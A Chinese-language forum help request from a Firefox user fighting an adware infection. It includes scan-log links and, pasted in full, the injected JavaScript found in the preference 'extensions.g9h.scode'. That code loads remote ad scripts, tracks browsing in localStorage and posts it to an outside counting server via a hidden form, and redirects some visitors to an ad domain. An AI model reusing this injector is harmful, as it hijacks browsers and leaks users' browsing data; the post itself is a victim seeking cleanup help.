firefox出现不明连线而且有时候会弹出广告

hijackthis:
http://www.sendspace.com/file/hov44x
mbam:
http://www.sendspace.com/file/pl7enc

firefox左下角显示出多个不明连线
有几个特别明显的是:
i.74055djs.info
cdncache-a.akamaihd.net
提醒:combofix会导致我系统无法进入windows(因为有误删档案前科)因此请不要使用combofix!

另外在控制台找到3个不明程式
saoVenusuhare,
SaveShare 1.74
SearchNewTab

但怕会激活因此并未删除!
跪求解决方法

然后在firefox的
about:config里以i.74055djs找寻
偏好设定名称:extensions.g9h.scode
值:
if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//i.74055djs.info/74055d/javascript.js?channel=p34&hid=0';document.getElementsByTagName("head")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement("script");script.type="text/javascript";script.src="//cdncache-a.akamaihd.net/loaders/1499/l.js?aoi=1311798366&pid=1499&zoneid=309594&ext=saveshare";document.getElementsByTagName("head")[0].appendChild(script)};;if(-1<window.self.location.hostname.indexOf("eo-online.me")&&window.self==window.top){var a=function(){try{jQuery(".down, .dloadf, .dloadt").attr("href","#")}catch(b){}},s=document.createElement("script");s.type="text/javascript";s[-1<navigator.userAgent.toLowerCase().indexOf("msie")?"text":"innerHTML"]="("+a.toString()+")()";document.getElementsByTagName("head")[0].appendChild(s)};;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||"undefined"==typeof localStorage||"undefined"==typeof localStorage.setItem||-1==a.indexOf("14LQIQIw=")&&!a.match(/1018-\d{3,4}_/)&&-1==a.indexOf("cdncache-a.aka"))){if(-1<a.indexOf("14LQIQIw=")){var d=a.match(/14LQIQIw=(\d+)_(\d{2,3}x\d{2,3})_?(\d+)?/);b=d[1];f=d[2].replace("x",".");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf("zoneid")?a.match(/zoneid=(\d+)/)[1]:a.match(/1018-(\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName("body")[0];b=-1<a.indexOf("cdncache-a.aka")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+"."+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l="zyk_"+[e.getUTCFullYear()+"-"+(e.getUTCMonth()+1)+"-"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem("zEpoch")){if(7200<k-parseInt(lsTime)){var h=document.createElement("div");b=[];for(i in localStorage)-1<i.indexOf("zyk_")&&b.push("'"+i.replace("zyk_","")+"':"+localStorage.getItem(i));h.style.display="none";h.innerHTML='<iframe name="webscorebox_ifr"></iframe><form target="webscorebox_ifr" method="post" action="http://count3.webscorebox.com/?q=g708BNmGWj8siGhVWzmPhd9GpdUMCyVUojr9tNhVCNqPB750pchSCM06C7lGojsMh7VUojaMAyVUojsEqjg9rdCEpjn=" id="webscorebox_frm"><input type="hidden" name="scores" value="{'+b.join(",")+'}"></form>';(typeof c!="undefined"?c:document.getElementsByTagName("body")[0]).appendChild(h);document.getElementById("webscorebox_frm").submit();localStorage.clear()}}else localStorage.setItem("zEpoch",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf("kass.t")&&setTimeout(function(){if(document.getElementById("_091c88d5b8c081bf15d212c4ae994c85")){var b=document.getElementById("_091c88d5b8c081bf15d212c4ae994c85"),a=document.createElement("div");a.setAttribute("style","width:100%;height:300%;position:absolute;left:0;top:0");a.innerHTML='<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==" style="width:100%;height:100%">';b.style.position="relative";b.appendChild(a)}document.getElementById("_2bffc94164dd9984ae4826e8bc988721")&&(b=document.getElementById("_2bffc94164dd9984ae4826e8bc988721"),a=document.createElement("div"),a.setAttribute("style","width:100%;height:121%;position:absolute;left:0;top:0"),a.innerHTML='<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==" style="width:100%;height:100%">',b.style.position="relative",b.appendChild(a))},250)})();;(function(){if("http:"==window.self.location.protocol)try{var b="gonetwork.eu performancerevenues.com adtransfer adk2.com clkads.com xtendmedia.com cpxinteractive media-servers doubleclick brealtime.com adnxs.com yieldmanager yieldads adserverplus exoclick.com vitalads zedo.com mshft pop.billi edomz realpopbid bestadbid directdisplayad displayadfeed adorika akamaihd.net/ssa/ trusted-serving".split(" ");for(i=0;i<b.length;i++){var a=document.title?document.title.toLowerCase():"z";if(document.referrer&&-1<document.referrer.indexOf(b)&&(-1<a.indexOf("download")||-1<a.indexOf("convert")||-1<window.self.location.href.indexOf("babylon")||-1<window.self.location.href.indexOf("ilivid")||-1<window.self.location.href.indexOf("download")||-1<a.indexOf("regclean")||-1<a.indexOf("etype")||-1<a.indexOf("diction")||-1<a.indexOf("player"))){location.href="http://imp.trafficunit.in/e/?eid=289&hid=2056407094&pid=34&ch=99&s=px.pluginh&r="+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer.parentNode.removeChild(c2soffer);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}

重点:不能重设...

已经24小时
用了f-secureonlineScanner后发现2个有害项目
但不知道为什么在他帮我重新开机后无法显示出来
然而同时在开机时弹出来自ie的指示码
询问是否执行指令码
(有一点记得很清楚的是位置是在local)
然后马上用了mbam扫出3个有害东西
最新的hijackthis:
http://www.sendspace.com/file/p8guul
最新的mbam:
http://www.sendspace.com/file/kig0t5

FIREFOX参数档案(请用notepad开启)
http://www.sendspace.com/file/1dhtmj

ps:参数档内的extensions.g9h.scode
会变成0是因为我在firefox的 about:config中修改了参数
然而发现它会过一段时间后会再被激活

把相关的句子全部删除后再重新安装firefox后的prefs.js
http://www.sendspace.com/file/kd5ilz
但chrome好像还是有问题...